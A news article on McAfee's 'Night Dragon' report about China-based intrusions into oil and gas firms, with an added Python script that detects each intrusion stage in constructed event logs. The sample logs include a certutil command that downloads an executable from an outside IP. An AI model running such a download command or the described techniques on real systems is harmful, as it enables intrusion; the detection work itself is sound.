‘Night Dragon’ Espionage Report

Hackers working in China broke into the computer networks of five multinational oil and gas companies, stealing bidding plans and other critical information, McAfee said in a report. The attacks have been dubbed “Night Dragon”; the report did not identify the companies that were hacked. It did say that at least seven more companies had also been compromised, though it could not confirm that data was stolen from them.

This issue “speaks to quite a sad state of our critical infrastructure security.” These attacks have involved social engineering, spear-phishing attacks, exploitation of Microsoft Windows operating system vulnerabilities, Microsoft Active Directory compromises, and the use of remote administration tools (RATs) in targeting and harvesting sensitive competitive information.

“These were not sophisticated attacks. Yet they were very successful in achieving their goals,” said Dmitri Alperovitch, McAfee’s VP of threat research. The hackers got into the companies either through their public-facing websites or through spear-phishing emails carrying malware that were sent to company executives. The Night Dragon attacks work through methodical and progressive intrusions, each stage opening the way for the next.

These basic activities were performed by the Night Dragon operation:

  • Company extranet web servers are compromised through SQL-injection techniques, allowing remote command execution on the server.
  • Common hacker tools are uploaded to the compromised web servers, giving the attackers a foothold from which to reach the intranet and sensitive internal desktops and servers.
  • Password-cracking and pass-the-hash tools yield additional usernames, passwords, and reusable password hashes, allowing further authenticated access to sensitive internal desktops and servers.
  • The compromised web servers are turned into command and control (C&C) servers for the malware planted inside the network.
  • The malware disables the Internet Explorer (IE) proxy settings so that infected machines bypass the corporate proxy and communicate directly with the Internet and the attackers’ infrastructure.
  • Remote access malware lets the attackers pivot to other machines, targeting executives, and exfiltrate email archives and other sensitive documents.
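Each of those stages leaves a distinct trace in host and network telemetry. The script below is an added example, not code from the McAfee report or from the article: it applies one detection rule per stage (server process spawning a shell for the SQL-injection stage, a DMZ web server initiating SMB/RDP connections inward for the foothold and pivot stages, NTLM network-logon fan-out from one source and account for the pass-the-hash stage, and ProxyEnable being set to 0 for the proxy-disabling stage) to a handful of constructed, Sysmon-style event records. The event field names, host names, the DMZ inventory, the internal address range, and the process watchlists are all assumptions chosen for the example.

```python
"""Stage-by-stage detection for a Night Dragon-style intrusion chain.

Added example (not from the McAfee report). Field names, hosts and
watchlists below are assumptions; the event records are constructed.
"""
from collections import defaultdict
import ipaddress
import json

DMZ_WEB_SERVERS = {"ext-web01"}                    # assumed role inventory
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")  # assumed intranet range
SERVER_PROCESSES = {"w3wp.exe", "sqlservr.exe", "httpd", "tomcat"}  # assumed
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}
LATERAL_PORTS = {135, 445, 3389}                   # RPC, SMB, RDP
PTH_HOST_THRESHOLD = 3  # distinct hosts one (source, account) pair may hit

# Constructed sample telemetry (JSON lines), not real captured data.
SAMPLE_EVENTS = r"""
{"type":"process","host":"ext-web01","parent":"sqlservr.exe","image":"cmd.exe","cmdline":"cmd.exe /c whoami"}
{"type":"process","host":"ext-web01","parent":"w3wp.exe","image":"cmd.exe","cmdline":"cmd.exe /c certutil -urlcache -f http://203.0.113.5/t.exe t.exe"}
{"type":"process","host":"ws-exec07","parent":"explorer.exe","image":"outlook.exe","cmdline":"outlook.exe"}
{"type":"network","host":"ext-web01","image":"t.exe","dst":"10.1.4.22","dport":445}
{"type":"network","host":"ext-web01","image":"t.exe","dst":"10.1.4.23","dport":3389}
{"type":"network","host":"ext-web01","image":"w3wp.exe","dst":"10.2.0.9","dport":1433}
{"type":"logon","host":"ws-fin01","user":"CORP\\svc_backup","logon_type":3,"auth":"NTLM","src":"10.1.4.22"}
{"type":"logon","host":"ws-fin02","user":"CORP\\svc_backup","logon_type":3,"auth":"NTLM","src":"10.1.4.22"}
{"type":"logon","host":"ws-exec07","user":"CORP\\svc_backup","logon_type":3,"auth":"NTLM","src":"10.1.4.22"}
{"type":"logon","host":"dc01","user":"CORP\\jdoe","logon_type":3,"auth":"Kerberos","src":"10.1.4.40"}
{"type":"registry","host":"ws-exec07","image":"svchost_upd.exe","key":"HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings","value":"ProxyEnable","data":0}
{"type":"registry","host":"ws-fin01","image":"explorer.exe","key":"HKU\\S-1-5-21-2\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings","value":"ProxyEnable","data":1}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def rule_server_spawns_shell(ev):
    """Stage 1: web/DB server process spawning an OS shell (SQLi -> command execution)."""
    if (ev["type"] == "process" and ev["parent"].lower() in SERVER_PROCESSES
            and ev["image"].lower() in SHELLS):
        return (ev["host"], "1-web-server-command-execution",
                f'{ev["parent"]} -> {ev["cmdline"]}')
    return None


def rule_dmz_to_internal(ev):
    """Stage 2: a DMZ web server initiating RPC/SMB/RDP connections into the intranet."""
    if (ev["type"] == "network" and ev["host"] in DMZ_WEB_SERVERS
            and ipaddress.ip_address(ev["dst"]) in INTERNAL_NET
            and ev["dport"] in LATERAL_PORTS):
        return (ev["host"], "2-dmz-host-initiating-internal-admin-connection",
                f'{ev["image"]} -> {ev["dst"]}:{ev["dport"]}')
    return None


def rule_proxy_disabled(ev):
    """Stage 5: ProxyEnable set to 0 under the IE Internet Settings key."""
    if (ev["type"] == "registry" and ev["key"].endswith("Internet Settings")
            and ev["value"] == "ProxyEnable" and ev["data"] == 0):
        return (ev["host"], "5-ie-proxy-disabled", f'{ev["image"]} set ProxyEnable=0')
    return None


def rule_ntlm_fanout(events):
    """Stage 3: one source and account using NTLM network logons (type 3) against
    many hosts, the pattern a pass-the-hash sweep leaves in logon telemetry."""
    targets = defaultdict(set)
    for ev in events:
        if ev["type"] == "logon" and ev["logon_type"] == 3 and ev["auth"] == "NTLM":
            targets[(ev["src"], ev["user"])].add(ev["host"])
    return [(src, "3-ntlm-lateral-fanout", f"{user} -> {sorted(hosts)}")
            for (src, user), hosts in targets.items()
            if len(hosts) >= PTH_HOST_THRESHOLD]


def detect(text):
    """Run all rules over the telemetry; returns (host, stage, detail) findings."""
    events = parse_events(text)
    findings = []
    for ev in events:
        for rule in (rule_server_spawns_shell, rule_dmz_to_internal, rule_proxy_disabled):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    findings.extend(rule_ntlm_fanout(events))
    return findings


if __name__ == "__main__":
    for host, stage, detail in detect(SAMPLE_EVENTS):
        print(f"{host:10} {stage:48} {detail}")
```

Run stand-alone it prints six findings: two shell spawns on the extranet server, two inward SMB/RDP connections from it (the legitimate 1433 connection to the internal database is not flagged), the ProxyEnable=0 change on the executive workstation, and the NTLM fan-out of one account from one source to three hosts. On real telemetry the thresholds and role inventory are what need tuning; the stage structure is the point.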

The tools, techniques, and network activities used in these continuing attacks have been identified as originating primarily in China. Through coordinated analysis of the related events and tools used, McAfee has determined identifying features to assist companies with detection and investigation. While many actors may have participated in these attacks, one individual has been identified who provided the crucial C&C infrastructure to the attackers. The hackers had access to these networks for at least the last two years, and possibly for as long as four years. They focused on financial documents related to oil and gas field exploration and bidding contracts. They also copied proprietary industrial processes that are “tremendously sensitive and would be worth a huge amount of money” to competitors.

The hack was traced back to China via a server leasing company in Shandong Province that hosted the malware, and to Beijing IP addresses that were active from 9 a.m. to 5 p.m. Beijing time.  Western governments and companies have long been concerned about Chinese corporate espionage.  Washington believes that hacking attacks on Google that prompted the company to pull out of China for a brief period of time were orchestrated by two members of the country’s ruling body, according to leaked U.S. diplomatic cables.  The French government is looking into a possible Chinese role in spying on carmaker Renault SA’s and Nissan’s electric vehicle programs.  In 2007, a Chinese student working at car parts maker Valeo was sentenced to prison for stealing confidential documents.  A French tribunal stopped short of an industrial espionage verdict, instead finding that she had “abused trust.”